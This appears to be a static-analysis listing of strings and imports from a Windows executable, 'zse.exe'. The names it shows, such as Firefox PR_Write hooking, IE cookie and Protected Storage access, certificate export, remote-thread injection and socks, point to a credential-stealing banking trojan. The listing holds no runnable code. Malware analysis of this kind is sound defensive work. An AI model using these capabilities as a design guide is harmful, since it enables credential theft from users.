.rdata:0041714E 0000000B C OpenMutexA

.rdata:0041715C 00000017 C SetTimeZoneInformation

.rdata:00417176 00000008 C lstrlen

.rdata:00417180 0000000D C CreateThread

.rdata:00417190 00000013 C CreateRemoteThread

.rdata:004171A6 0000000F C CompareStringW

.rdata:004171B8 0000001D C SetProcessShutdownParameters

.rdata:004171D8 0000001C C Toolhelp32ReadProcessMemory

.rdata:004171F6 00000019 C GetPrivateProfileStructW

.rdata:00417212 00000010 C GetProcessHeaps

.rdata:00417224 0000000F C GetDateFormatW

.rdata:00417236 00000012 C SetTapeParameters

.rdata:0041724A 0000001D C SetConsoleActiveScreenBuffer

.rdata:0041726A 0000000B C OpenMutexW

.rdata:00417278 00000018 C IsSystemResumeAutomatic

.rdata:00417292 00000010 C SetTapePosition

.rdata:004172A4 0000000A C EraseTape

.rdata:004172B0 0000001B C PostQueuedCompletionStatus

.rdata:004172CE 0000000A C LocalFree

.rdata:004172DA 00000012 C GetThreadPriority

.rdata:004172EE 0000001C C FillConsoleOutputCharacterW

.rdata:0041730C 00000008 C lstrcmp

.rdata:00417316 00000016 C WaitForSingleObjectEx

.rdata:0041732E 00000011 C GetComputerNameW

.rdata:00417342 0000000F C GetThreadTimes

.rdata:00417354 00000012 C EnumCalendarInfoW

.rdata:00417368 0000000C C BackupWrite

.rdata:00417376 0000000E C SuspendThread

.rdata:00417384 0000000D C KERNEL32.dll

zse.exe The type of compiler used to build the program is vc6win Visual C++ v6.

F (dark blue) - regular function:

DialogFunc 004241D2 start 00424306 P

StartAddress 00424509

D (light green) Ŕ data:

hWnd 00429030

lpMem 00429034

hInstance 00429040

szDir 00429050

hHeap 0042A020

I (purple) - imported name:

00401000 CryptHashData ADVAPI32

00401004 CryptDestroyHash ADVAPI32

00401008 CryptCreateHash ADVAPI32 0040100C CryptGetHashParam ADVAPI32

00401010 CryptReleaseContext ADVAPI32

00401014 CryptAcquireContextW ADVAPI32 0040101C GetSaveFileNameW COMDLG32

00401020 GetOpenFileNameW COMDLG32

00401028 WriteFile KERNEL32 0040102C ReadFile KERNEL32

00401030 CreateFileW KERNEL32

00401034 OpenMutexW KERNEL32 00401038 SetNamedPipeHandleState KERNEL32

0040103C HeapReAlloc KERNEL32

00401040 MapViewOfFile KERNEL32 00401044 UnmapViewOfFile KERNEL32

00401048 FreeLibrary KERNEL32

0040104C HeapAlloc KERNEL32 00401050 HeapFree KERNEL32

00401054 GetTickCount KERNEL32

00401058 GetProcessHeap KERNEL32 0040105C WaitNamedPipeW KERNEL32

00401060 HeapDestroy KERNEL32

00401064 HeapCreate KERNEL32

00401068 MultiByteToWideChar KERNEL32 0040106C GetFileSizeEx KERNEL32

00401070 CreateFileMappingW KERNEL32

00401074 SetFileAttributesW KERNEL32 00401078 CreateThread KERNEL32

0040107C CloseHandle KERNEL32

00401080 Sleep KERNEL32 00401084 GetModuleHandleA KERNEL32

00401088 LoadLibraryA KERNEL32

0040108C GetProcAddress KERNEL32 00401090 GetModuleFileNameW KERNEL32

00401094 ExitProcess KERNEL32

00401098 lstrcmpiA KERNEL32 0040109C lstrcpyW KERNEL32

004010A0 WideCharToMultiByte KERNEL32

004010A4 DeleteFileW KERNEL32 004010AC ShellExecuteW SHELL32

004010B4 wvnsprintfW SHLWAPI

004010B8 wnsprintfW SHLWAPI 004010BC PathRemoveFileSpecW SHLWAPI

004010C0 PathFileExistsW SHLWAPI

004010C4 StrCmpNIA SHLWAPI

004010C8 PathFindFileNameA SHLWAPI 004010CC PathCombineW SHLWAPI

004010D4 GetWindowTextLengthW USER32

004010D8 MessageBoxW USER32 004010DC SetWindowTextW USER32

004010E0 DestroyWindow USER32

004010E4 LoadImageW USER32 004010E8 DialogBoxParamW USER32

004010EC EndDialog USER32

004010F0 ShowWindow USER32 004010F4 CreateDialogParamW USER32

004010F8 GetDlgItem USER32

004010FC SetWindowLongW USER32 00401100 GetDlgItemTextW USER32

00401104 EnableWindow USER32

00401108 SendMessageW USER32 0040110C SetDlgItemTextW USER32

00401114 OleInitialize ole32

A (dark green) - ascii string:

aThisProgramCan 0040429C

aMz 004042D0

aF 004046D0 aRoot 004046DC

aGrb 004046E8

a_txt 004046F0 aNspr4_dll 004046FC

aPr_write 00404708

aPopopo03333111 00404714 aPathS 0040472C

aSS 00404738

aCookie 00404740

aPostquitmessag 0041B080

aPostmessagew 0041B090

aPostmessagea 0041B0A0 aPeekmessagew_0 0041B0B0

aPeekmessagea 0041B0C0

aPaintdesktop 0041B0D0 aPackddelparam 0041B0E0

aOpenwindowst_0 0041B0F0

aOpenwindowst_1 0041B104 aOpeninputdeskt 0041B118

aOpenicon 0041B12C

aOpendesktopw 0041B138

aShregwriteusva 0041EBDC

aShregwriteus_0 0041EBF0

aShregsetusvalu 0041EC04 aShregsetusva_0 0041EC18

aShregqueryusva 0041EC2C

aShregqueryus_0 0041EC40 aShregqueryinfo 0041EC54

aShregqueryin_0 0041EC6C

aShregopenuskey 0041EC84 aShregopenusk_0 0041EC94

aShreggetusvalu 0041ECA4

aShreggetusva_0 0041ECB8

aIe_cookies 00404750

aPstorecreatein 00404768 aPstorec_dll 00404780

aStringdata 0040478C

aIeCookies 004047A4 aEmpty 004047B4

aProtectedStora 004047BC

aMacromediaFlas 004047EC a_sol 0040481C

aMfplayer_cfg_c 00404828

aTd 0040484C aTr 00404850

aHr 00404854

aBr 00404858 aTranslatemessa 00405278

aWsaconnect 0040528C

aConnect 00405298 aClosesocket 004052A0

aSend 004052AC

aHttpqueryinfow 004052B4

aHttpqueryinfoa 004052C4

aInternetcloseh 004052D4

aInternetqueryd 004052E8 aInternetreadfi 00405304

aInternetread_0 00405318

aInternetread_1 0040532C aHttpsendreques 00405340

aHttpsendrequ_0 00405354

aHttpsendrequ_1 00405368 aHttpsendrequ_2 0040537C

aNtquerydirecto 00405390

aLdrgetprocedur 004053A8 aLdrloaddll 004053C0

aNtcreatethread 004053CC

aRsldps 004053DC a09ck_Ldfuihpfr 004053EC

a3709128dk00234 00405400

aMy 00405414 a009023434 0040541C

aStartPage 00405430

aSoftwareMicros 0040543C a23324mM434dkkl 00405468

a3208_09303333 0040547C

aUnknown 00405494 aGet 004054A8

aPost 004054B0

aHttp1_ 004054B8 aHost 004054C0

aPr_getpeername 004054C8

aReferer 004054D8 aContentType 004054E0

aPr_getnamefori 004054F0 aNssLayer 00405508

aHttps 00405514

aHttp 00405520 aU_U_U_U 00405528

aU 00405534

aGet_0 00405538

aPost_0 0040553C

aGetprocaddress 00405544

aLoadlibrarya 00405554 a09283940745957 00405564

a809dslffsdfsdf 00405578

aMKeolkp90344 0040558C aOk 004055A0

aUnknownCommand 004055A4

aSyntaxErrorAtL 004055C0 aScriptAlreadyE 004055DC

aInternalComman 004055F8

aSoftwareMicr_0 00405620

aOpendesktopa_0 0041B148

aOpenclipboard 0041B158 aOffsetrect 0041B168

aOemtocharw 0041B174

aOemtocharbuffw 0041B180 aOemtocharbuffa 0041B190

aOemtochara 0041B1A0

aOemkeyscan 0041B1AC aNotifywinevent 0041B1B8

aMsgwaitformu_0 0041B1C8

aMsgwaitformu_1 0041B1E4 aMovewindow 0041B200

aMonitorfromwin 0041B20C

aMonitorfromrec 0041B220 aMonitorfrompoi 0041B230

aModifymenuw 0041B244

aModifymenua 0041B250 aMessageboxw 0041B25C

aMessageboxindi 0041B268

aMessageboxin_0 0041B27C

aMessageboxexw 0041B290

aMessageboxexa 0041B2A0

aMessageboxa 0041B2B0 aMessagebeep 0041B2BC

aMenuitemfrompo 0041B2C8

aMapwindowpoint 0041B2DC aMapvirtualkeyw 0041B2EC

aMapvirtualkeye 0041B2FC

aMapvirtualke_0 0041B310 aMapvirtualkeya 0041B324

aMapdialogrect 0041B334

aLookupiconidfr 0041B344 aLookupiconid_0 0041B360

aLockwindowupda 0041B37C

aLoadstringw 0041B390 aLoadstringa 0041B39C

aLoadmenuw 0041B3A8

aLoadmenuindire 0041B3B4 aLoadmenuindi_0 0041B3C8

aLoadmenua 0041B3DC

aLoadkeyboardla 0041B3E8 aLoadkeyboard_0 0041B3FC

aLoadimagew 0041B410

aLoadimagea 0041B41C aLoadiconw 0041B428

aLoadicona 0041B434

aLoadcursorw_0 0041B440 aLoadcursorfr_0 0041B44C

aLoadcursorfrom 0041B460

aLoadcursora 0041B474 aLoadbitmapw 0041B480

aLoadbitmapa 0041B48C aLoadaccelerato 0041B498

aLoadaccelera_0 0041B4AC

aKilltimer 0041B4C0 aIszoomed 0041B4CC

aIswindowvisibl 0041B4D8

aIswindowunicod 0041B4E8

aIswindowenable 0041B4F8

aIswindow 0041B508

aIsrectempty 0041B514 aIsmenu 0041B520

aIsiconic 0041B528

aIsdlgbuttonche 0041B534 aIsdialogmessag 0041B548

aIsdialogmess_0 0041B55C

aIsdialogmess_1 0041B570 aIsclipboardfor 0041B580

aIschild 0041B59C

aIscharupperw 0041B5A4

aShreggetboolus 0041ECCC

aShreggetbool_0 0041ECE4 aShregenumusval 0041ECFC

aShregenumusv_0 0041ED10

aShregenumuskey 0041ED24 aShregenumusk_0 0041ED34

aShregduplicate 0041ED44

aShregdeleteusv 0041ED58 aShregdeleteu_0 0041ED6C

aShregdeleteemp 0041ED80

aShregdeletee_0 0041ED98 aShregcreateusk 0041EDB0

aShregcreateu_0 0041EDC4

aShregcloseuske 0041EDD8 aShqueryvalueex 0041EDE8

aShqueryvalue_0 0041EDF8

aShqueryinfokey 0041EE08 aShqueryinfok_0 0041EE18

aShopenregstrea 0041EE28

aShopenregstr_0 0041EE3C

aShopenregstr_1 0041EE50

aShopenregstr_2 0041EE64

aShislowmemorym 0041EE78 aShgetvaluew 0041EE90

aShgetvaluea 0041EE9C

aShgetthreadref 0041EEA8 aShgetinversecm 0041EEB8

aShenumvaluew 0041EECC

aShenumvaluea 0041EEDC aShenumkeyexw 0041EEEC

aShenumkeyexa 0041EEFC

aShdeletevaluew 0041EF0C aShdeletevaluea 0041EF1C

aShdeletekeyw 0041EF2C

aShdeletekeya_0 0041EF3C aShdeleteemptyk 0041EF4C

aShdeleteempt_0 0041EF60

aShcreatestream 0041EF74 aShcreatestre_0 0041EF8C

aShcreateshellp 0041EFA4

aShcopykeyw 0041EFBC aShcopykeya 0041EFC8

aShautocomplete 0041EFD4

aPathunquotespa 0041EFE4 aPathunquotes_0 0041EFF8

aPathunmakesyst 0041F00C

aPathunmakesy_0 0041F024 aPathundecorate 0041F03C

aPathundecora_0 0041F04C

aPathstriptoroo 0041F05C aPathstriptor_0 0041F070

aPathstrippathw 0041F084 aPathstrippatha 0041F094

aPathskiproot_0 0041F0A4

aPathskiproota 0041F0B4 aPathsetdlgitem 0041F0C4

aPathsetdlgit_0 0041F0D8

aPathsearchandq 0041F0EC

aPathsearchan_0 0041F104

aPathrenameexte 0041F11C

aPathrenameex_0 0041F134 aPathremovefi_0 0041F14C

aPathremovefi_1 0041F160

aPathremoveexte 0041F174 aPathremoveex_0 0041F18C

aPathremoveblan 0041F1A4

aPathremovebl_0 0041F1B8 aPathremoveba_0 0041F1CC

aPathremoveba_1 0041F1E4

aPathremoveargs 0041F1FC

a_def 00405688

aSocks 00405694 a213kjhndkmnihj 0040569C

aSSS 004056B0

aGetusernameexw 004056BC aPfxexportcerts 004056CC

aCertduplicatec 004056E0

aRtdeletecertif 00405702 aCertenumsystem 00405720

aErtenumcertifi 00405735

aCertclosestore 00405750 aCertopensystem 00405760

aClsidfromstrin 00405778

aStringfromguid 00405788 aCocreateinstan 00405798

aGetwindowtextw 004057AC

aGetclassnamew 004057BC aGetwindowlongw 004057CC

aSendmessagew 004057DC

aFindwindowexw 004057EC

aGetdlgitemtext 004057FC

aGetdlgitemte_0 0040580C

aGetdlgitem 0040581C aGeticoninfo 00405828

aDrawicon 00405834

aGetcursorpos 00405840 aLoadcursorw 00405850

aSetthreaddeskt 0040585C

aClosedesktop 00405870 aOpendesktopa 00405880

aSetprocesswind 00405890

aClosewindowsta 004058A8 aOpenwindowstat 004058BC

aGetforegroundw 004058D0

aGetwindowthrea 004058E4 aDispatchmessag 00405900

aMsgwaitformult 00405914

aGetkeyboardsta 00405930 aTounicode 00405944

aGetkeystate 00405950

aDispatchmess_0 0040595C aPeekmessagew 00405970

aCharlowerbuffa 00405980

aExitwindowsex 00405990 aChartooemw 004059A0

aCharupperw 004059AC

aWsagetlasterro 004059B8 aWsasetlasterro 004059C8

aSelect 004059D8

aWsaioctl 004059E0 aRecv 004059EC

aRecvfrom 004059F4 aGetsockname 00405A00

aFreeaddrinfo 00405A0C

aGetaddrinfo 00405A1C aShutdown 00405A28

aWsacleanup 00405A34

aWsastartup 00405A40

aAccept 00405A4C

aListen 00405A54

aBind 00405A5C aSocket 00405A64

aGetpeername 00405A6C

aSendto 00405A78 aWsasendto 00405A80

aWsasend 00405A8C

aCryptreleaseco 00405A94 aCryptdestroyha 00405AA8

aCryptgethashpa 00405ABC

aCrypthashdata 00405AD0

aIscharuppera 0041B5B4

aIscharlowerw 0041B5C4 aIscharlowera 0041B5D4

aIscharalphaw 0041B5E4

aIscharalphanum 0041B5F4 aIscharalphan_0 0041B608

aIscharalphaa 0041B61C

aInvertrect 0041B62C aInvalidatergn 0041B638

aInvalidaterect 0041B648

aIntersectrect 0041B658 aInternalgetwin 0041B668

aInsertmenuw 0041B680

aInsertmenuitem 0041B68C aInsertmenuit_0 0041B69C

aInsertmenua 0041B6AC

aInflaterect 0041B6B8 aInsendmessagee 0041B6C4

aInsendmessage 0041B6D4

aImpersonatedde 0041B6E4

aHilitemenuitem 0041B700

aHidecaret 0041B710

aGraystringw 0041B71C aGraystringa 0041B728

aGetwindowword 0041B734

aGetwindowthr_0 0041B744 aGetwindowtex_0 0041B760

aGetwindowtextl 0041B770

aGetwindowtex_1 0041B788 aGetwindowtexta 0041B7A0

aGetwindowrgn 0041B7B0

aGetwindowrect 0041B7C0 aGetwindowplace 0041B7D0

aGetwindowmodul 0041B7E4

aGetwindowmod_0 0041B800 aGetwindowlon_0 0041B81C

aGetwindowlonga 0041B82C

aGetwindowinfo 0041B83C aGetwindowdc 0041B84C

aGetwindowconte 0041B858

aGetwindow 0041B870 aGetuserobjects 0041B87C

aGetuserobjecti 0041B894

aGetuserobjec_0 0041B8B0 aGetupdatergn 0041B8CC

aGetupdaterect 0041B8DC

aGettopwindow 0041B8EC aGettitlebarinf 0041B8FC

aGetthreaddeskt 0041B90C

aGettabbedtexte 0041B920 aGettabbedtex_0 0041B938

aGetsystemmetri 0041B950 aGetsystemmenu 0041B964

aGetsyscolorbru 0041B974

aGetsyscolor 0041B988 aGetsubmenu 0041B994

aGetshellwindow 0041B9A0

aGetscrollrange 0041B9B0

aGetscrollpos 0041B9C0

aGetscrollinfo 0041B9D0

aGetscrollbarin 0041B9E0 aGetqueuestatus 0041B9F4

aGetpropw 0041BA04

aGetpropa 0041BA10 aGetprocesswind 0041BA1C

aGetprocessdefa 0041BA34

aGetprioritycli 0041BA4C aGetparent 0041BA68

aGetopenclipboa 0041BA74

aGetnextdlgtabi 0041BA8C

aPathremovear_0 0041F20C

aPathrelativepa 0041F21C aPathrelative_0 0041F230

aPathquotespace 0041F244

aPathquotespa_0 0041F258 aPathparseiconl 0041F26C

aPathparseico_0 0041F284

aPathmatchspe_0 0041F29C aPathmatchspeca 0041F2AC

aPathmakesystem 0041F2BC

aPathmakesyst_0 0041F2D4 aPathmakepretty 0041F2EC

aPathmakepret_0 0041F2FC

aPathisurlw 0041F30C aPathisurla 0041F318

aPathisuncw 0041F324

aPathisuncserve 0041F330 aPathisuncser_0 0041F344

aPathisuncser_1 0041F35C

aPathisuncser_2 0041F374

aPathisunca 0041F388

aPathissystemfo 0041F394

aPathissystem_0 0041F3A8 aPathissameroot 0041F3BC

aPathissamero_0 0041F3CC

aPathisrootw 0041F3DC aPathisroota 0041F3E8

aPathisrelative 0041F3F4

aPathisrelati_0 0041F404 aPathisprefixw 0041F414

aPathisprefixa 0041F424

aPathisnetworkp 0041F434 aPathisnetwor_0 0041F448

aPathislfnfiles 0041F45C

aPathislfnfil_0 0041F470 aPathisfilespec 0041F484

aPathisfilesp_0 0041F494

aPathisdirector 0041F4A4 aPathisdirect_0 0041F4B8

aPathisdirect_1 0041F4D0

aPathisdirect_2 0041F4E8 aPathiscontentt 0041F4FC

aPathisconten_0 0041F510

aPathgetdrivenu 0041F524 aPathgetdrive_0 0041F538

aPathgetchartyp 0041F54C

aPathgetchart_0 0041F560 aPathgetargsw 0041F574

aPathgetargsa 0041F584

aPathfindsuffix 0041F594 aPathfindsuff_0 0041F5AC

aPathfindonpath 0041F5C4 aPathfindonpa_0 0041F5D4

aPathfindnextco 0041F5E4

aPathfindnext_0 0041F5FC aPathfindfile_0 0041F614

aPathfindfile_1 0041F628

aPathfindextens 0041F63C

aPathfindexte_0 0041F650

aPathfileexis_0 0041F664

aPathfileexis_1 0041F674 aPathcreatefrom 0041F684

aPathcreatefr_0 0041F698

aPathcompactpat 0041F6AC aPathcompactp_0 0041F6C0

aPathcompactp_1 0041F6D4

aPathcompactp_2 0041F6E8 aPathcommonpref 0041F6FC

aPathcommonpr_0 0041F710

aPathcombinew_0 0041F724

aCryptcreatehas 00405AE0

aCryptacquireco 00405AF0 aDuplicatetoken 00405B08

aCreateprocessa 00405B1C

aSetsecuritydes 00405B34 aInitializesecu 00405B50

aRegenumkeyexw 00405B70

aRegdeletevalue 00405B80 aRegsetvalueexa 00405B90

aRegsetvalueexw 00405BA0

aRegclosekey 00405BB0 aRegopenkeyexw 00405BBC

aRegcreatekeyex 00405BCC

aRegcreatekey_0 00405BDC aRegqueryvaluee 00405BEC

aLookupaccounts 00405C00

aGettokeninform 00405C14 aOpenprocesstok 00405C28

aAdjusttokenpri 00405C3C

aLookupprivileg 00405C54

aGetusernamew 00405C6C

aDeleteurlcache 00405C7C

aFindcloseurlca 00405C94 aFindnexturlcac 00405CA8

aFindfirsturlca 00405CC0

aInternetsetopt 00405CD8 aInternetsetsta 00405CEC

aGeturlcacheent 00405D08

aHttpaddrequest 00405D20 aHttpaddreque_0 00405D38

aInternetqueryo 00405D50

aInternetcheckc 00405D68 aInternetcracku 00405D84

aHttpopenreques 00405D98

aInternetconnec 00405DAC aInternetopenur 00405DC0

aInternetopena 00405DD4

aInternetgetcoo 00405DE4 aGetmodulefilen 00405DF8

aShdeletekeya 00405E10

aPathmatchspecw 00405E20 aPathremovefile 00405E30

aPathfileexists 00405E44

aPathskiprootw 00405E54 aPathremoveback 00405E64

aPathaddextensi 00405E7C

aPathaddbacksla 00405E90 aPathfindfilena 00405EA4

aPathcombinew 00405EB8

aWnsprintfa 00405EC8 aWnsprintfw 00405ED4

aWvnsprintfa 00405EE0 aWvnsprintfw 00405EEC

aStrcmpniw 00405EF8

aStrcmpnia 00405F04 aStrstria 00405F10

aStrstrw 00405F1C

aRtlcreateusert 00405F24

aLdrgetdllhandl 00405F38

aNtqueryinforma 00405F48

aNtcreatefile 00405F64 aNtqueryobject 00405F74

aShellexecutew 00405F84

aShgetfolderpat 00405F94 aShgetspecialfo 00405FA8

aFindresourcew 00405FC0

aExpandenvironm 00405FD0 aGlobalunlock 00405FEC

aGloballock 00405FFC

aGetfiletime 00406008

aGetnextdlggrou 0041BAA0

aGetmonitorinfo 0041BAB4 aGetmonitorin_0 0041BAC4

aGetmessagew 0041BAD4

aGetmessagetime 0041BAE0 aGetmessagepos 0041BAF0

aGetmessageextr 0041BB00

aGetmessagea 0041BB14 aGetmenustringw 0041BB20

aGetmenustringa 0041BB30

aGetmenustate 0041BB40 aGetmenuitemrec 0041BB50

aGetmenuiteminf 0041BB60

aGetmenuitemi_0 0041BB74 aGetmenuitemid 0041BB88

aGetmenuitemcou 0041BB98

aGetmenuinfo 0041BBAC aGetmenudefault 0041BBB8

aGetmenucontext 0041BBCC

aGetmenucheckma 0041BBE4

aGetmenubarinfo 0041BC00

aGetmenu 0041BC10

aGetlistboxinfo 0041BC18 aGetlastactivep 0041BC28

aGetkeyboardtyp 0041BC3C

aGetkeyboards_0 0041BC4C aGetkeyboardlay 0041BC60

aGetkeyboardl_0 0041BC78

aGetkeyboardl_1 0041BC90 aGetkeyboardl_2 0041BCA8

aGetkeystate_0 0041BCBC

aGetkeynametext 0041BCC8 aGetkeynamete_0 0041BCD8

aGetkbcodepage 0041BCE8

aGetinputstate 0041BCF8 aGetinputdeskto 0041BD08

aGeticoninfo_0 0041BD18

aGetguiresource 0041BD24 aGetguithreadin 0041BD34

aGetforegroun_0 0041BD48

aGetfocus 0041BD5C aGetdoubleclick 0041BD68

aGetdlgitemte_1 0041BD7C

aGetdlgitemte_2 0041BD8C aGetdlgitemint 0041BD9C

aGetdlgitem_0 0041BDAC

aGetdlgctrlid 0041BDB8 aGetdialogbaseu 0041BDC8

aGetdesktopwind 0041BDDC

aGetdcex 0041BDF0 aGetdc 0041BDF8

aGetcursorpos_0 0041BE00 aGetcursorinfo 0041BE10

aGetcursor 0041BE20

aGetcomboboxinf 0041BE2C aGetclipboardvi 0041BE3C

aGetclipboardse 0041BE50

aGetclipboardow 0041BE6C

aGetclipboardfo 0041BE80

aGetclipboard_0 0041BE98

aGetclipboardda 0041BEB0 aGetclipcursor 0041BEC4

aGetclientrect 0041BED4

aGetclassword 0041BEE4 aGetclassname_0 0041BEF4

aGetclassnamea 0041BF04

aGetclasslongw 0041BF14 aGetclasslonga 0041BF24

aGetclassinfow 0041BF34

aGetclassinfoex 0041BF44

aPathcombinea 0041F734

aPathcanonicali 0041F744 aPathcanonica_0 0041F758

aPathbuildrootw 0041F76C

aPathbuildroota 0041F77C aPathappendw 0041F78C

aPathappenda 0041F798

aPathaddexten_0 0041F7A4 aPathaddexten_1 0041F7B8

aPathaddbacks_0 0041F7CC

aPathaddbacks_1 0041F7E0 aIntlstreqworke 0041F7F4

aIntlstreqwor_0 0041F808

aHashdata 0041F81C aGetmenuposfrom 0041F828

aColorrgbtohls 0041F83C

aColorhlstorgb 0041F84C aColoradjustlum 0041F85C

aChrcmpiw 0041F86C

aChrcmpia 0041F878

aAssocquerystri 0041F884

aAssocqueryst_0 0041F898

aAssocqueryst_1 0041F8B0 aAssocqueryst_2 0041F8C8

aAssocquerykeyw 0041F8DC

aAssocquerykeya 0041F8EC aLstrlenw 0041F8FC

aLstrlena 0041F908

aLstrlen 0041F914 aLstrcpynw_0 0041F91C

aLstrcpyna_0 0041F928

aLstrcpyn 0041F934 aLstrcpyw_0 0041F940

aLstrcpya_0 0041F94C

aLstrcpy 0041F958 aLstrcmpiw_0 0041F960

aLstrcmpia_0 0041F96C

aLstrcmpi 0041F978 aLstrcmpw 0041F984

aLstrcmpa 0041F990

aLstrcmp 0041F99C aLstrcatw_0 0041F9A4

aLstrcata_0 0041F9B0

aLstrcat 0041F9BC aWritetapemark 0041F9C4

aWriteprofilest 0041F9D4

aWriteprofile_0 0041F9E8 aWriteprofilese 0041F9FC

aWriteprofile_1 0041FA14

aWriteprocess_0 0041FA2C aWriteprivatepr 0041FA40

aWriteprivate_0 0041FA5C aWriteprivate_1 0041FA78

aWriteprivate_2 0041FA94

aWriteprivate_3 0041FAB0 aWriteprivate_4 0041FACC

aWritefilegathe 0041FAE8

aWritefileex 0041FAF8

aWritefile_0 0041FB04

aWriteconsolew 0041FB10

aWriteconsoleou 0041FB20 aWriteconsole_0 0041FB34

aWriteconsole_1 0041FB54

aWriteconsole_2 0041FB74 aWriteconsole_3 0041FB90

aWriteconsolein 0041FBA4

aWriteconsole_4 0041FBB8 aWriteconsolea 0041FBCC

aWinexec 0041FBDC

aWidechartomu_0 0041FBE4

aSetfiletime 00406014

aGetcomputernam 00406020 aFindclose 00406034

aFindnextfilew 00406040

aFindfirstfilew 00406050 aGettempfilenam 00406060

aSystemtimetofi 00406074

aGetsystemtime 0040608C aLeavecriticals 0040609C

aEntercriticals 004060B4

aInitializecrit 004060CC aReadprocessmem 004060E8

aSetlasterror 004060FC

aIsbadwriteptr 0040610C aIsbadreadptr 0040611C

aGettemppathw 0040612C

aCreatedirector 0040613C aMovefileexw 00406150

aWidechartomult 0040615C

aMultibytetowid 00406170

aGetprocesstime 00406184

aCreateprocessw 00406194

aGetcurrentthre 004061A4 aGetcurrentth_0 004061B8

aGetthreadprior 004061CC

aSetthreadprior 004061E0 aGetcurrentproc 004061F4

aVirtualfreeex 00406208

aVirtualprote_0 00406218 aVirtualallocex 0040622C

aVirtualqueryex 0040623C

aOpenprocess 0040624C aExitprocess 00406258

aExitthread 00406264

aGetexitcodepro 00406270 aThread32next 00406284

aThread32first 00406294

aModule32nextw 004062A4 aModule32firstw 004062B4

aProcess32nextw 004062C4

aProcess32first 004062D4 aCreatetoolhelp 004062E4

aCreateremoteth 00406300

aCreatethread 00406314 aWriteprocessme 00406324

aDisconnectname 00406338

aGetlocaltime 0040634C aFlushfilebuffe 0040635C

aGetfilesize 00406370

aSetendoffile 0040637C aReadfile 0040638C

aWritefile 00406398 aGettickcount 004063A4

aCreatenamedpip 004063B4

aSetnamedpipeha 004063C8 aWaitnamedpipew 004063E0

aConnectnamedpi 004063F0

aHeapfree 00406404

aHeaprealloc 00406410

aHeapalloc 0040641C

aHeapdestroy 00406428 aHeapcreate 00406434

aSetfilepointer 00406440

aCreateeventw 00406450 aCreatefilew 00406460

aSetevent 0040646C

aWaitforsingleo 00406478 aSetfileattribu 0040648C

aDeletefilew 004064A0

aClosehandle 004064AC

aGetclassinfo_0 0041BF54

aGetclassinfoa 0041BF64 aGetcaretpos 0041BF74

aGetcaretblinkt 0041BF80

aGetcapture 0041BF94 aGetasynckeysta 0041BFA0

aGetancestor 0041BFB4

aGetalttabinfo 0041BFC0 aGetactivewindo 0041BFD0

aFreeddelparam 0041BFE0

aFramerect 0041BFF0 aFlashwindowex 0041BFFC

aFlashwindow 0041C00C

aFindwindoww 0041C018 aFindwindowex_0 0041C024

aFindwindowexa 0041C034

aFindwindowa 0041C044 aFillrect 0041C050

aExitwindowse_0 0041C05C

aExcludeupdater 0041C06C

aEqualrect 0041C080

aEnumwindows 0041C08C

aEnumwindowstat 0041C098 aEnumwindowst_0 0041C0AC

aEnumthreadwind 0041C0C0

aEnumpropsw 0041C0D4 aEnumpropsexw 0041C0E0

aEnumpropsexa 0041C0F0

aEnumpropsa 0041C100 aEnumdisplayset 0041C10C

aEnumdisplays_0 0041C124

aEnumdisplays_1 0041C13C aEnumdisplays_2 0041C154

aEnumdisplaymon 0041C16C

aEnumdisplaydev 0041C180 aEnumdisplayd_0 0041C194

aEnumdesktopsw 0041C1A8

aEnumdesktopsa 0041C1B8 aEnumdesktopwin 0041C1C8

aEnumclipboardf 0041C1DC

aEnumchildwindo 0041C1F4 aEndtask 0041C208

aEndpaint 0041C210

aEndmenu 0041C21C aEnddialog 0041C224

aEnddeferwindow 0041C230

aEnablewindow 0041C244 aEnablescrollba 0041C254

aEnablemenuitem 0041C264

aEmptyclipboard 0041C274 aEditwndproc 0041C284

aDrawtextw 0041C290 aDrawtextexw 0041C29C

aDrawtextexa 0041C2A8

aDrawtexta 0041C2B4 aDrawstatew 0041C2C0

aDrawstatea 0041C2CC

aDrawmenubar 0041C2D8

aDrawiconex 0041C2E4

aDrawicon_0 0041C2F0

aDrawframecontr 0041C2FC aDrawframe 0041C310

aDrawfocusrect 0041C31C

aDrawedge 0041C32C aDrawcaption 0041C338

aDrawanimatedre 0041C344

aDragobject 0041C358 aDragdetect 0041C364

aDlgdirselectex 0041C370

aDlgdirselect_0 0041C380

aWaitnamedpip_0 0041FBF8

aWaitnamedpipea 0041FC08 aWaitforsingl_0 0041FC18

aWaitforsingl_1 0041FC30

aWaitformulti_0 0041FC44 aWaitformulti_1 0041FC60

aWaitfordebugev 0041FC78

aWaitcommevent 0041FC8C aVirtualunlock 0041FC9C

aVirtualquery_0 0041FCAC

aVirtualquery 0041FCBC aVirtualprote_1 0041FCCC

aVirtualprotect 0041FCE0

aVirtuallock 0041FCF0 aVirtualfreee_0 0041FCFC

aVirtualfree 0041FD0C

aVirtualalloc_0 0041FD18 aVirtualalloc 0041FD28

aVerlanguagenam 0041FD38

aVerlanguagen_0 0041FD4C

aUpdateresource 0041FD60

aUpdateresour_0 0041FD70

aUnmapviewoff_0 0041FD80 aUnlockfileex 0041FD90

aUnlockfile 0041FDA0

aUnhandledexcep 0041FDAC aTransmitcommch 0041FDC8

aTransactnamedp 0041FDDC

aToolhelp32read 0041FDF0 aTlssetvalue 0041FE0C

aTlsgetvalue 0041FE18

aTlsfree 0041FE24 aTlsalloc 0041FE2C

aThread32next_0 0041FE38

aThread32firs_0 0041FE48 aTerminatethrea 0041FE58

aTerminateproce 0041FE68

aSystemtimetotz 0041FE7C aSystemtimeto_0 0041FE9C

aSwitchtothread 0041FEB4

aSwitchtofiber 0041FEC4 aSuspendthrea_0 0041FED4

aSleepex 0041FEE4

aSleep_0 0041FEEC aSizeofresource 0041FEF4

aSignalobjectan 0041FF04

aSetupcomm 0041FF18 aSetwaitabletim 0041FF24

aSetvolumelabel 0041FF38

aSetvolumelab_0 0041FF48 aSetunhandledex 0041FF58

aSettimezoneinf 0041FF74 aSetthreadpri_0 0041FF8C

aSetthreadpri_1 0041FFA4

aSetthreadlocal 0041FFB8 aSetthreadideal 0041FFC8

aSetthreadexecu 0041FFE0

aSetthreadconte 0041FFF8

aSetthreadaffin 0042000C

aSettapepositio 00420024

aSettapeparamet 00420034 aSetsystemtimea 00420048

aSetsystemtime 00420060

aSetsystempower 00420070 aSetstdhandle 00420084

aSetprocesswork 00420094

aSetprocessshut 004200B0 aSetprocessprio 004200D0

aSetprocessaffi 004200E8

aSetprioritycla 00420100

aLstrcata 004064B8

aLstrcatw 004064C4 aLstrcpya 004064D0

aLstrcpyna 004064DC

